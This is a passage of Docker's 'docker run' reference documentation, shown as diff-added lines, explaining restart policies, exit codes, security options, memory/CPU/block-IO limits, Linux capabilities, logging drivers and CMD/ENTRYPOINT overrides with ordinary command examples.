+ +The following example creates a network using the built-in `bridge` network +driver and running a container in the created network + +``` +$ docker network create -d bridge my-net +$ docker run --network=my-net -itd --name=container3 busybox +``` + +### Managing /etc/hosts + +Your container will have lines in `/etc/hosts` which define the hostname of the +container itself as well as `localhost` and a few other common things. The +`--add-host` flag can be used to add additional lines to `/etc/hosts`. + + $ docker run -it --add-host db-static:86.75.30.9 ubuntu cat /etc/hosts + 172.17.0.22 09d03f76bf2c + fe00::0 ip6-localnet + ff00::0 ip6-mcastprefix + ff02::1 ip6-allnodes + ff02::2 ip6-allrouters + 127.0.0.1 localhost + ::1 localhost ip6-localhost ip6-loopback + 86.75.30.9 db-static + +If a container is connected to the default bridge network and `linked` +with other containers, then the container's `/etc/hosts` file is updated +with the linked container's name. + +If the container is connected to user-defined network, the container's +`/etc/hosts` file is updated with names of all other containers in that +user-defined network. + +> **Note** Since Docker may live update the container’s `/etc/hosts` file, there +may be situations when processes inside the container can end up reading an +empty or incomplete `/etc/hosts` file. In most cases, retrying the read again +should fix the problem. + +## Restart policies (--restart) + +Using the `--restart` flag on Docker run you can specify a restart policy for +how a container should or should not be restarted on exit. + +When a restart policy is active on a container, it will be shown as either `Up` +or `Restarting` in [`docker ps`](commandline/ps.md). It can also be +useful to use [`docker events`](commandline/events.md) to see the +restart policy in effect. + +Docker supports the following restart policies: + + + + + + + + + + + + + + + + + + + + + + + + + + +
PolicyResult
no + Do not automatically restart the container when it exits. This is the + default. +
+ + on-failure[:max-retries] + + + Restart only if the container exits with a non-zero exit status. + Optionally, limit the number of restart retries the Docker + daemon attempts. +
always + Always restart the container regardless of the exit status. + When you specify always, the Docker daemon will try to restart + the container indefinitely. The container will also always start + on daemon startup, regardless of the current state of the container. +
unless-stopped + Always restart the container regardless of the exit status, but + do not start it on daemon startup if the container has been put + to a stopped state before. +
+ +An ever increasing delay (double the previous delay, starting at 100 +milliseconds) is added before each restart to prevent flooding the server. +This means the daemon will wait for 100 ms, then 200 ms, 400, 800, 1600, +and so on until either the `on-failure` limit is hit, or when you `docker stop` +or `docker rm -f` the container. + +If a container is successfully restarted (the container is started and runs +for at least 10 seconds), the delay is reset to its default value of 100 ms. + +You can specify the maximum amount of times Docker will try to restart the +container when using the **on-failure** policy. The default is that Docker +will try forever to restart the container. The number of (attempted) restarts +for a container can be obtained via [`docker inspect`](commandline/inspect.md). For example, to get the number of restarts +for container "my-container"; + + {% raw %} + $ docker inspect -f "{{ .RestartCount }}" my-container + # 2 + {% endraw %} + +Or, to get the last time the container was (re)started; + + {% raw %} + $ docker inspect -f "{{ .State.StartedAt }}" my-container + # 2015-03-04T23:47:07.691840179Z + {% endraw %} + + +Combining `--restart` (restart policy) with the `--rm` (clean up) flag results +in an error. On container restart, attached clients are disconnected. See the +examples on using the [`--rm` (clean up)](#clean-up-rm) flag later in this page. + +### Examples + + $ docker run --restart=always redis + +This will run the `redis` container with a restart policy of **always** +so that if the container exits, Docker will restart it. + + $ docker run --restart=on-failure:10 redis + +This will run the `redis` container with a restart policy of **on-failure** +and a maximum restart count of 10. If the `redis` container exits with a +non-zero exit status more than 10 times in a row Docker will abort trying to +restart the container. Providing a maximum restart limit is only valid for the +**on-failure** policy. 
+ +## Exit Status + +The exit code from `docker run` gives information about why the container +failed to run or why it exited. When `docker run` exits with a non-zero code, +the exit codes follow the `chroot` standard, see below: + +**_125_** if the error is with Docker daemon **_itself_** + + $ docker run --foo busybox; echo $? + # flag provided but not defined: --foo + See 'docker run --help'. + 125 + +**_126_** if the **_contained command_** cannot be invoked + + $ docker run busybox /etc; echo $? + # docker: Error response from daemon: Container command '/etc' could not be invoked. + 126 + +**_127_** if the **_contained command_** cannot be found + + $ docker run busybox foo; echo $? + # docker: Error response from daemon: Container command 'foo' not found or does not exist. + 127 + +**_Exit code_** of **_contained command_** otherwise + + $ docker run busybox /bin/sh -c 'exit 3'; echo $? + # 3 + +## Clean up (--rm) + +By default a container's file system persists even after the container +exits. This makes debugging a lot easier (since you can inspect the +final state) and you retain all your data by default. But if you are +running short-term **foreground** processes, these container file +systems can really pile up. If instead you'd like Docker to +**automatically clean up the container and remove the file system when +the container exits**, you can add the `--rm` flag: + + --rm=false: Automatically remove the container when it exits (incompatible with -d) + +> **Note**: When you set the `--rm` flag, Docker also removes the volumes +associated with the container when the container is removed. This is similar +to running `docker rm -v my-container`. Only volumes that are specified without a +name are removed. For example, with +`docker run --rm -v /foo -v awesome:/bar busybox top`, the volume for `/foo` will be removed, +but the volume for `/bar` will not. 
Volumes inherited via `--volumes-from` will be removed +with the same logic -- if the original volume was specified with a name it will **not** be removed. + +## Security configuration + --security-opt="label=user:USER" : Set the label user for the container + --security-opt="label=role:ROLE" : Set the label role for the container + --security-opt="label=type:TYPE" : Set the label type for the container + --security-opt="label=level:LEVEL" : Set the label level for the container + --security-opt="label=disable" : Turn off label confinement for the container + --security-opt="apparmor=PROFILE" : Set the apparmor profile to be applied to the container + --security-opt="no-new-privileges" : Disable container processes from gaining new privileges + --security-opt="seccomp=unconfined" : Turn off seccomp confinement for the container + --security-opt="seccomp=profile.json": White listed syscalls seccomp Json file to be used as a seccomp filter + + +You can override the default labeling scheme for each container by specifying +the `--security-opt` flag. Specifying the level in the following command +allows you to share the same content between containers. + + $ docker run --security-opt label=level:s0:c100,c200 -it fedora bash + +> **Note**: Automatic translation of MLS labels is not currently supported. + +To disable the security labeling for this container versus running with the +`--privileged` flag, use the following command: + + $ docker run --security-opt label=disable -it fedora bash + +If you want a tighter security policy on the processes within a container, +you can specify an alternate type for the container. You could run a container +that is only allowed to listen on Apache ports by executing the following +command: + + $ docker run --security-opt label=type:svirt_apache_t -it centos bash + +> **Note**: You would have to write policy defining a `svirt_apache_t` type. 
+ +If you want to prevent your container processes from gaining additional +privileges, you can execute the following command: + + $ docker run --security-opt no-new-privileges -it centos bash + +This means that commands that raise privileges such as `su` or `sudo` will no longer work. +It also causes any seccomp filters to be applied later, after privileges have been dropped +which may mean you can have a more restrictive set of filters. +For more details, see the [kernel documentation](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt). + +## Specifying custom cgroups + +Using the `--cgroup-parent` flag, you can pass a specific cgroup to run a +container in. This allows you to create and manage cgroups on their own. You can +define custom resources for those cgroups and put containers under a common +parent group. + +## Runtime constraints on resources + +The operator can also adjust the performance parameters of the +container: + +| Option | Description | +| -------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------- | +| `-m`, `--memory=""` | Memory limit (format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. Minimum is 4M. | +| `--memory-swap=""` | Total memory limit (memory + swap, format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. | +| `--memory-reservation=""` | Memory soft limit (format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. | +| `--kernel-memory=""` | Kernel memory limit (format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. Minimum is 4M. | +| `-c`, `--cpu-shares=0` | CPU shares (relative weight) | +| `--cpus=0.000` | Number of CPUs. Number is a fractional number. 0.000 means no limit. 
| +| `--cpu-period=0` | Limit the CPU CFS (Completely Fair Scheduler) period | +| `--cpuset-cpus=""` | CPUs in which to allow execution (0-3, 0,1) | +| `--cpuset-mems=""` | Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. | +| `--cpu-quota=0` | Limit the CPU CFS (Completely Fair Scheduler) quota | +| `--cpu-rt-period=0` | Limit the CPU real-time period. In microseconds. Requires parent cgroups be set and cannot be higher than parent. Also check rtprio ulimits. | +| `--cpu-rt-runtime=0` | Limit the CPU real-time runtime. In microseconds. Requires parent cgroups be set and cannot be higher than parent. Also check rtprio ulimits. | +| `--blkio-weight=0` | Block IO weight (relative weight) accepts a weight value between 10 and 1000. | +| `--blkio-weight-device=""` | Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`) | +| `--device-read-bps=""` | Limit read rate from a device (format: `:[]`). Number is a positive integer. Unit can be one of `kb`, `mb`, or `gb`. | +| `--device-write-bps=""` | Limit write rate to a device (format: `:[]`). Number is a positive integer. Unit can be one of `kb`, `mb`, or `gb`. | +| `--device-read-iops="" ` | Limit read rate (IO per second) from a device (format: `:`). Number is a positive integer. | +| `--device-write-iops="" ` | Limit write rate (IO per second) to a device (format: `:`). Number is a positive integer. | +| `--oom-kill-disable=false` | Whether to disable OOM Killer for the container or not. | +| `--oom-score-adj=0` | Tune container's OOM preferences (-1000 to 1000) | +| `--memory-swappiness=""` | Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. | +| `--shm-size=""` | Size of `/dev/shm`. The format is ``. `number` must be greater than `0`. Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes. If you omit the size entirely, the system uses `64m`. 
| + +### User memory constraints + +We have four ways to set user memory usage: + + + + + + + + + + + + + + + + + + + + + + + + + + +
OptionResult
+ memory=inf, memory-swap=inf (default) + + There is no memory limit for the container. The container can use + as much memory as needed. +
memory=L<inf, memory-swap=inf + (specify memory and set memory-swap as -1) The container is + not allowed to use more than L bytes of memory, but can use as much swap + as is needed (if the host supports swap memory). +
memory=L<inf, memory-swap=2*L + (specify memory without memory-swap) The container is not allowed to + use more than L bytes of memory, swap plus memory usage is double + of that. +
+ memory=L<inf, memory-swap=S<inf, L<=S + + (specify both memory and memory-swap) The container is not allowed to + use more than L bytes of memory, swap plus memory usage is limited + by S. +
+ +Examples: + + $ docker run -it ubuntu:14.04 /bin/bash + +We set nothing about memory, this means the processes in the container can use +as much memory and swap memory as they need. + + $ docker run -it -m 300M --memory-swap -1 ubuntu:14.04 /bin/bash + +We set memory limit and disabled swap memory limit, this means the processes in +the container can use 300M memory and as much swap memory as they need (if the +host supports swap memory). + + $ docker run -it -m 300M ubuntu:14.04 /bin/bash + +We set memory limit only, this means the processes in the container can use +300M memory and 300M swap memory, by default, the total virtual memory size +(--memory-swap) will be set as double of memory, in this case, memory + swap +would be 2*300M, so processes can use 300M swap memory as well. + + $ docker run -it -m 300M --memory-swap 1G ubuntu:14.04 /bin/bash + +We set both memory and swap memory, so the processes in the container can use +300M memory and 700M swap memory. + +Memory reservation is a kind of memory soft limit that allows for greater +sharing of memory. Under normal circumstances, containers can use as much of +the memory as needed and are constrained only by the hard limits set with the +`-m`/`--memory` option. When memory reservation is set, Docker detects memory +contention or low memory and forces containers to restrict their consumption to +a reservation limit. + +Always set the memory reservation value below the hard limit, otherwise the hard +limit takes precedence. A reservation of 0 is the same as setting no +reservation. By default (without reservation set), memory reservation is the +same as the hard memory limit. + +Memory reservation is a soft-limit feature and does not guarantee the limit +won't be exceeded. Instead, the feature attempts to ensure that, when memory is +heavily contended for, memory is allocated based on the reservation hints/setup. 
+ +The following example limits the memory (`-m`) to 500M and sets the memory +reservation to 200M. + +```bash +$ docker run -it -m 500M --memory-reservation 200M ubuntu:14.04 /bin/bash +``` + +Under this configuration, when the container consumes memory more than 200M and +less than 500M, the next system memory reclaim attempts to shrink container +memory below 200M. + +The following example sets memory reservation to 1G without a hard memory limit. + +```bash +$ docker run -it --memory-reservation 1G ubuntu:14.04 /bin/bash +``` + +The container can use as much memory as it needs. The memory reservation setting +ensures the container doesn't consume too much memory for a long time, because +every memory reclaim shrinks the container's consumption to the reservation. + +By default, the kernel kills processes in a container if an out-of-memory (OOM) +error occurs. To change this behaviour, use the `--oom-kill-disable` option. +Only disable the OOM killer on containers where you have also set the +`-m/--memory` option. If the `-m` flag is not set, this can result in the host +running out of memory and require killing the host's system processes to free +memory. + +The following example limits the memory to 100M and disables the OOM killer for +this container: + + $ docker run -it -m 100M --oom-kill-disable ubuntu:14.04 /bin/bash + +The following example illustrates a dangerous way to use the flag: + + $ docker run -it --oom-kill-disable ubuntu:14.04 /bin/bash + +The container has unlimited memory which can cause the host to run out of memory +and require killing system processes to free memory. The `--oom-score-adj` +parameter can be changed to select the priority of which containers will +be killed when the system is out of memory, with negative scores making them +less likely to be killed and positive more likely. + +### Kernel memory constraints + +Kernel memory is fundamentally different than user memory as kernel memory can't +be swapped out. 
The inability to swap makes it possible for the container to +block system services by consuming too much kernel memory. Kernel memory includes: + + - stack pages + - slab pages + - sockets memory pressure + - tcp memory pressure + +You can setup kernel memory limit to constrain these kinds of memory. For example, +every process consumes some stack pages. By limiting kernel memory, you can +prevent new processes from being created when the kernel memory usage is too high. + +Kernel memory is never completely independent of user memory. Instead, you limit +kernel memory in the context of the user memory limit. Assume "U" is the user memory +limit and "K" the kernel limit. There are three possible ways to set limits: + + + + + + + + + + + + + + + + + + + + + + +
OptionResult
U != 0, K = inf (default) + This is the standard memory limitation mechanism already present before using + kernel memory. Kernel memory is completely ignored. +
U != 0, K < U + Kernel memory is a subset of the user memory. This setup is useful in + deployments where the total amount of memory per-cgroup is overcommitted. + Overcommitting kernel memory limits is definitely not recommended, since the + box can still run out of non-reclaimable memory. + In this case, you can configure K so that the sum of all groups is + never greater than the total memory. Then, freely set U at the expense of + the system's service quality. +
U != 0, K > U + Kernel memory charges are also fed to the user counter and reclamation + is triggered for the container for both kinds of memory. This configuration + gives the admin a unified view of memory. It is also useful for people + who just want to track kernel memory usage. +
+ +Examples: + + $ docker run -it -m 500M --kernel-memory 50M ubuntu:14.04 /bin/bash + +We set memory and kernel memory, so the processes in the container can use +500M memory in total, in this 500M memory, it can be 50M kernel memory tops. + + $ docker run -it --kernel-memory 50M ubuntu:14.04 /bin/bash + +We set kernel memory without **-m**, so the processes in the container can +use as much memory as they want, but they can only use 50M kernel memory. + +### Swappiness constraint + +By default, a container's kernel can swap out a percentage of anonymous pages. +To set this percentage for a container, specify a `--memory-swappiness` value +between 0 and 100. A value of 0 turns off anonymous page swapping. A value of +100 sets all anonymous pages as swappable. By default, if you are not using +`--memory-swappiness`, memory swappiness value will be inherited from the parent. + +For example, you can set: + + $ docker run -it --memory-swappiness=0 ubuntu:14.04 /bin/bash + +Setting the `--memory-swappiness` option is helpful when you want to retain the +container's working set and to avoid swapping performance penalties. + +### CPU share constraint + +By default, all containers get the same proportion of CPU cycles. This proportion +can be modified by changing the container's CPU share weighting relative +to the weighting of all other running containers. + +To modify the proportion from the default of 1024, use the `-c` or `--cpu-shares` +flag to set the weighting to 2 or higher. If 0 is set, the system will ignore the +value and use the default of 1024. + +The proportion will only apply when CPU-intensive processes are running. +When tasks in one container are idle, other containers can use the +left-over CPU time. The actual amount of CPU time will vary depending on +the number of containers running on the system. + +For example, consider three containers, one has a cpu-share of 1024 and +two others have a cpu-share setting of 512. 
When processes in all three +containers attempt to use 100% of CPU, the first container would receive +50% of the total CPU time. If you add a fourth container with a cpu-share +of 1024, the first container only gets 33% of the CPU. The remaining containers +receive 16.5%, 16.5% and 33% of the CPU. + +On a multi-core system, the shares of CPU time are distributed over all CPU +cores. Even if a container is limited to less than 100% of CPU time, it can +use 100% of each individual CPU core. + +For example, consider a system with more than three cores. If you start one +container `{C0}` with `-c=512` running one process, and another container +`{C1}` with `-c=1024` running two processes, this can result in the following +division of CPU shares: + + PID container CPU CPU share + 100 {C0} 0 100% of CPU0 + 101 {C1} 1 100% of CPU1 + 102 {C1} 2 100% of CPU2 + +### CPU period constraint + +The default CPU CFS (Completely Fair Scheduler) period is 100ms. We can use +`--cpu-period` to set the period of CPUs to limit the container's CPU usage. +And usually `--cpu-period` should work with `--cpu-quota`. + +Examples: + + $ docker run -it --cpu-period=50000 --cpu-quota=25000 ubuntu:14.04 /bin/bash + +If there is 1 CPU, this means the container can get 50% CPU worth of run-time every 50ms. + +In addition to use `--cpu-period` and `--cpu-quota` for setting CPU period constraints, +it is possible to specify `--cpus` with a float number to achieve the same purpose. +For example, if there is 1 CPU, then `--cpus=0.5` will achieve the same result as +setting `--cpu-period=50000` and `--cpu-quota=25000` (50% CPU). + +The default value for `--cpus` is `0.000`, which means there is no limit. + +For more information, see the [CFS documentation on bandwidth limiting](https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt). + +### Cpuset constraint + +We can set cpus in which to allow execution for containers. 
+ +Examples: + + $ docker run -it --cpuset-cpus="1,3" ubuntu:14.04 /bin/bash + +This means processes in the container can be executed on cpu 1 and cpu 3. + + $ docker run -it --cpuset-cpus="0-2" ubuntu:14.04 /bin/bash + +This means processes in the container can be executed on cpu 0, cpu 1 and cpu 2. + +We can set mems in which to allow execution for containers. Only effective +on NUMA systems. + +Examples: + + $ docker run -it --cpuset-mems="1,3" ubuntu:14.04 /bin/bash + +This example restricts the processes in the container to only use memory from +memory nodes 1 and 3. + + $ docker run -it --cpuset-mems="0-2" ubuntu:14.04 /bin/bash + +This example restricts the processes in the container to only use memory from +memory nodes 0, 1 and 2. + +### CPU quota constraint + +The `--cpu-quota` flag limits the container's CPU usage. The default 0 value +allows the container to take 100% of a CPU resource (1 CPU). The CFS (Completely Fair +Scheduler) handles resource allocation for executing processes and is the default +Linux scheduler used by the kernel. Set this value to 50000 to limit the container +to 50% of a CPU resource. For multiple CPUs, adjust the `--cpu-quota` as necessary. +For more information, see the [CFS documentation on bandwidth limiting](https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt). + +### Block IO bandwidth (Blkio) constraint + +By default, all containers get the same proportion of block IO bandwidth +(blkio). This proportion is 500. To modify this proportion, change the +container's blkio weight relative to the weighting of all other running +containers using the `--blkio-weight` flag. + +> **Note:** The blkio weight setting is only available for direct IO. Buffered IO +> is not currently supported. + +The `--blkio-weight` flag can set the weighting to a value between 10 and 1000. 
+For example, the commands below create two containers with different blkio +weight: + + $ docker run -it --name c1 --blkio-weight 300 ubuntu:14.04 /bin/bash + $ docker run -it --name c2 --blkio-weight 600 ubuntu:14.04 /bin/bash + +If you do block IO in the two containers at the same time, by, for example: + + $ time dd if=/mnt/zerofile of=test.out bs=1M count=1024 oflag=direct + +You'll find that the proportion of time is the same as the proportion of blkio +weights of the two containers. + +The `--blkio-weight-device="DEVICE_NAME:WEIGHT"` flag sets a specific device weight. +The `DEVICE_NAME:WEIGHT` is a string containing a colon-separated device name and weight. +For example, to set `/dev/sda` device weight to `200`: + + $ docker run -it \ + --blkio-weight-device "/dev/sda:200" \ + ubuntu + +If you specify both the `--blkio-weight` and `--blkio-weight-device`, Docker +uses the `--blkio-weight` as the default weight and uses `--blkio-weight-device` +to override this default with a new value on a specific device. +The following example uses a default weight of `300` and overrides this default +on `/dev/sda` setting that weight to `200`: + + $ docker run -it \ + --blkio-weight 300 \ + --blkio-weight-device "/dev/sda:200" \ + ubuntu + +The `--device-read-bps` flag limits the read rate (bytes per second) from a device. +For example, this command creates a container and limits the read rate to `1mb` +per second from `/dev/sda`: + + $ docker run -it --device-read-bps /dev/sda:1mb ubuntu + +The `--device-write-bps` flag limits the write rate (bytes per second) to a device. +For example, this command creates a container and limits the write rate to `1mb` +per second for `/dev/sda`: + + $ docker run -it --device-write-bps /dev/sda:1mb ubuntu + +Both flags take limits in the `:[unit]` format. Both read +and write rates must be a positive integer. You can specify the rate in `kb` +(kilobytes), `mb` (megabytes), or `gb` (gigabytes). 
+ +The `--device-read-iops` flag limits read rate (IO per second) from a device. +For example, this command creates a container and limits the read rate to +`1000` IO per second from `/dev/sda`: + + $ docker run -ti --device-read-iops /dev/sda:1000 ubuntu + +The `--device-write-iops` flag limits write rate (IO per second) to a device. +For example, this command creates a container and limits the write rate to +`1000` IO per second to `/dev/sda`: + + $ docker run -ti --device-write-iops /dev/sda:1000 ubuntu + +Both flags take limits in the `:` format. Both read and +write rates must be a positive integer. + +## Additional groups + --group-add: Add additional groups to run as + +By default, the docker container process runs with the supplementary groups looked +up for the specified user. If one wants to add more to that list of groups, then +one can use this flag: + + $ docker run --rm --group-add audio --group-add nogroup --group-add 777 busybox id + uid=0(root) gid=0(root) groups=10(wheel),29(audio),99(nogroup),777 + +## Runtime privilege and Linux capabilities + + --cap-add: Add Linux capabilities + --cap-drop: Drop Linux capabilities + --privileged=false: Give extended privileges to this container + --device=[]: Allows you to run devices inside the container without the --privileged flag. + +By default, Docker containers are "unprivileged" and cannot, for +example, run a Docker daemon inside a Docker container. This is because +by default a container is not allowed to access any devices, but a +"privileged" container is given access to all devices (see +the documentation on [cgroups devices](https://www.kernel.org/doc/Documentation/cgroup-v1/devices.txt)). + +When the operator executes `docker run --privileged`, Docker will enable +access to all devices on the host as well as set some configuration +in AppArmor or SELinux to allow the container nearly all the same access to the +host as processes running outside containers on the host. 
Additional +information about running with `--privileged` is available on the +[Docker Blog](http://blog.docker.com/2013/09/docker-can-now-run-within-docker/). + +If you want to limit access to a specific device or devices you can use +the `--device` flag. It allows you to specify one or more devices that +will be accessible within the container. + + $ docker run --device=/dev/snd:/dev/snd ... + +By default, the container will be able to `read`, `write`, and `mknod` these devices. +This can be overridden using a third `:rwm` set of options to each `--device` flag: + + $ docker run --device=/dev/sda:/dev/xvdc --rm -it ubuntu fdisk /dev/xvdc + + Command (m for help): q + $ docker run --device=/dev/sda:/dev/xvdc:r --rm -it ubuntu fdisk /dev/xvdc + You will not be able to write the partition table. + + Command (m for help): q + + $ docker run --device=/dev/sda:/dev/xvdc:w --rm -it ubuntu fdisk /dev/xvdc + crash.... + + $ docker run --device=/dev/sda:/dev/xvdc:m --rm -it ubuntu fdisk /dev/xvdc + fdisk: unable to open /dev/xvdc: Operation not permitted + +In addition to `--privileged`, the operator can have fine grain control over the +capabilities using `--cap-add` and `--cap-drop`. By default, Docker has a default +list of capabilities that are kept. The following table lists the Linux capability +options which are allowed by default and can be dropped. + +| Capability Key | Capability Description | +| ---------------- | ----------------------------------------------------------------------------------------------------------------------------- | +| SETPCAP | Modify process capabilities. | +| MKNOD | Create special files using mknod(2). | +| AUDIT_WRITE | Write records to kernel auditing log. | +| CHOWN | Make arbitrary changes to file UIDs and GIDs (see chown(2)). | +| NET_RAW | Use RAW and PACKET sockets. | +| DAC_OVERRIDE | Bypass file read, write, and execute permission checks. 
| +| FOWNER | Bypass permission checks on operations that normally require the file system UID of the process to match the UID of the file. | +| FSETID | Don't clear set-user-ID and set-group-ID permission bits when a file is modified. | +| KILL | Bypass permission checks for sending signals. | +| SETGID | Make arbitrary manipulations of process GIDs and supplementary GID list. | +| SETUID | Make arbitrary manipulations of process UIDs. | +| NET_BIND_SERVICE | Bind a socket to internet domain privileged ports (port numbers less than 1024). | +| SYS_CHROOT | Use chroot(2), change root directory. | +| SETFCAP | Set file capabilities. | + +The next table shows the capabilities which are not granted by default and may be added. + +| Capability Key | Capability Description | +| ---------------- | ----------------------------------------------------------------------------------------------------------------------------- | +| SYS_MODULE | Load and unload kernel modules. | +| SYS_RAWIO | Perform I/O port operations (iopl(2) and ioperm(2)). | +| SYS_PACCT | Use acct(2), switch process accounting on or off. | +| SYS_ADMIN | Perform a range of system administration operations. | +| SYS_NICE | Raise process nice value (nice(2), setpriority(2)) and change the nice value for arbitrary processes. | +| SYS_RESOURCE | Override resource Limits. | +| SYS_TIME | Set system clock (settimeofday(2), stime(2), adjtimex(2)); set real-time (hardware) clock. | +| SYS_TTY_CONFIG | Use vhangup(2); employ various privileged ioctl(2) operations on virtual terminals. | +| AUDIT_CONTROL | Enable and disable kernel auditing; change auditing filter rules; retrieve auditing status and filtering rules. | +| MAC_OVERRIDE | Allow MAC configuration or state changes. Implemented for the Smack LSM. | +| MAC_ADMIN | Override Mandatory Access Control (MAC). Implemented for the Smack Linux Security Module (LSM). | +| NET_ADMIN | Perform various network-related operations. 
| +| SYSLOG | Perform privileged syslog(2) operations. | +| DAC_READ_SEARCH | Bypass file read permission checks and directory read and execute permission checks. | +| LINUX_IMMUTABLE | Set the FS_APPEND_FL and FS_IMMUTABLE_FL i-node flags. | +| NET_BROADCAST | Make socket broadcasts, and listen to multicasts. | +| IPC_LOCK | Lock memory (mlock(2), mlockall(2), mmap(2), shmctl(2)). | +| IPC_OWNER | Bypass permission checks for operations on System V IPC objects. | +| SYS_PTRACE | Trace arbitrary processes using ptrace(2). | +| SYS_BOOT | Use reboot(2) and kexec_load(2), reboot and load a new kernel for later execution. | +| LEASE | Establish leases on arbitrary files (see fcntl(2)). | +| WAKE_ALARM | Trigger something that will wake up the system. | +| BLOCK_SUSPEND | Employ features that can block system suspend. | + +Further reference information is available on the [capabilities(7) - Linux man page](http://man7.org/linux/man-pages/man7/capabilities.7.html) + +Both flags support the value `ALL`, so if the +operator wants to have all capabilities but `MKNOD` they could use: + + $ docker run --cap-add=ALL --cap-drop=MKNOD ... + +For interacting with the network stack, instead of using `--privileged` they +should use `--cap-add=NET_ADMIN` to modify the network interfaces. 
+ + $ docker run -it --rm ubuntu:14.04 ip link add dummy0 type dummy + RTNETLINK answers: Operation not permitted + $ docker run -it --rm --cap-add=NET_ADMIN ubuntu:14.04 ip link add dummy0 type dummy + +To mount a FUSE based filesystem, you need to combine both `--cap-add` and +`--device`: + + $ docker run --rm -it --cap-add SYS_ADMIN sshfs sshfs sven@10.10.10.20:/home/sven /mnt + fuse: failed to open /dev/fuse: Operation not permitted + $ docker run --rm -it --device /dev/fuse sshfs sshfs sven@10.10.10.20:/home/sven /mnt + fusermount: mount failed: Operation not permitted + $ docker run --rm -it --cap-add SYS_ADMIN --device /dev/fuse sshfs + # sshfs sven@10.10.10.20:/home/sven /mnt + The authenticity of host '10.10.10.20 (10.10.10.20)' can't be established. + ECDSA key fingerprint is 25:34:85:75:25:b0:17:46:05:19:04:93:b5:dd:5f:c6. + Are you sure you want to continue connecting (yes/no)? yes + sven@10.10.10.20's password: + root@30aa0cfaf1b5:/# ls -la /mnt/src/docker + total 1516 + drwxrwxr-x 1 1000 1000 4096 Dec 4 06:08 . + drwxrwxr-x 1 1000 1000 4096 Dec 4 11:46 .. + -rw-rw-r-- 1 1000 1000 16 Oct 8 00:09 .dockerignore + -rwxrwxr-x 1 1000 1000 464 Oct 8 00:09 .drone.yml + drwxrwxr-x 1 1000 1000 4096 Dec 4 06:11 .git + -rw-rw-r-- 1 1000 1000 461 Dec 4 06:08 .gitignore + .... + +The default seccomp profile will adjust to the selected capabilities, in order to allow +use of facilities allowed by the capabilities, so you should not have to adjust this, +since Docker 1.12. In Docker 1.10 and 1.11 this did not happen and it may be necessary +to use a custom seccomp profile or use `--security-opt seccomp=unconfined` when adding +capabilities. + +## Logging drivers (--log-driver) + +The container can have a different logging driver than the Docker daemon. Use +the `--log-driver=VALUE` with the `docker run` command to configure the +container's logging driver. 
The following options are supported: + +| Driver | Description | +| ----------- | ----------------------------------------------------------------------------------------------------------------------------- | +| `none` | Disables any logging for the container. `docker logs` won't be available with this driver. | +| `json-file` | Default logging driver for Docker. Writes JSON messages to file. No logging options are supported for this driver. | +| `syslog` | Syslog logging driver for Docker. Writes log messages to syslog. | +| `journald` | Journald logging driver for Docker. Writes log messages to `journald`. | +| `gelf` | Graylog Extended Log Format (GELF) logging driver for Docker. Writes log messages to a GELF endpoint likeGraylog or Logstash. | +| `fluentd` | Fluentd logging driver for Docker. Writes log messages to `fluentd` (forward input). | +| `awslogs` | Amazon CloudWatch Logs logging driver for Docker. Writes log messages to Amazon CloudWatch Logs | +| `splunk` | Splunk logging driver for Docker. Writes log messages to `splunk` using Event Http Collector. | + +The `docker logs` command is available only for the `json-file` and `journald` +logging drivers. For detailed information on working with logging drivers, see +[Configure a logging driver](https://docs.docker.com/engine/admin/logging/overview/). + + +## Overriding Dockerfile image defaults + +When a developer builds an image from a [*Dockerfile*](builder.md) +or when she commits it, the developer can set a number of default parameters +that take effect when the image starts up as a container. + +Four of the Dockerfile commands cannot be overridden at runtime: `FROM`, +`MAINTAINER`, `RUN`, and `ADD`. Everything else has a corresponding override +in `docker run`. We'll go through what the developer might have set in each +Dockerfile instruction and how the operator can override that setting. 
+ + - [CMD (Default Command or Options)](#cmd-default-command-or-options) + - [ENTRYPOINT (Default Command to Execute at Runtime)]( + #entrypoint-default-command-to-execute-at-runtime) + - [EXPOSE (Incoming Ports)](#expose-incoming-ports) + - [ENV (Environment Variables)](#env-environment-variables) + - [HEALTHCHECK](#healthcheck) + - [VOLUME (Shared Filesystems)](#volume-shared-filesystems) + - [USER](#user) + - [WORKDIR](#workdir) + +### CMD (default command or options) + +Recall the optional `COMMAND` in the Docker +commandline: + + $ docker run [OPTIONS] IMAGE[:TAG|@DIGEST] [COMMAND] [ARG...] + +This command is optional because the person who created the `IMAGE` may +have already provided a default `COMMAND` using the Dockerfile `CMD` +instruction. As the operator (the person running a container from the +image), you can override that `CMD` instruction just by specifying a new +`COMMAND`. + +If the image also specifies an `ENTRYPOINT` then the `CMD` or `COMMAND` +get appended as arguments to the `ENTRYPOINT`. + +### ENTRYPOINT (default command to execute at runtime) + + --entrypoint="": Overwrite the default entrypoint set by the image + +The `ENTRYPOINT` of an image is similar to a `COMMAND` because it +specifies what executable to run when the container starts, but it is +(purposely) more difficult to override. The `ENTRYPOINT` gives a +container its default nature or behavior, so that when you set an +`ENTRYPOINT` you can run the container *as if it were that binary*, +complete with default options, and you can pass in more options via the +`COMMAND`. But, sometimes an operator may want to run something else +inside the container, so you can override the default `ENTRYPOINT` at +runtime by using a string to specify the new `ENTRYPOINT`. 
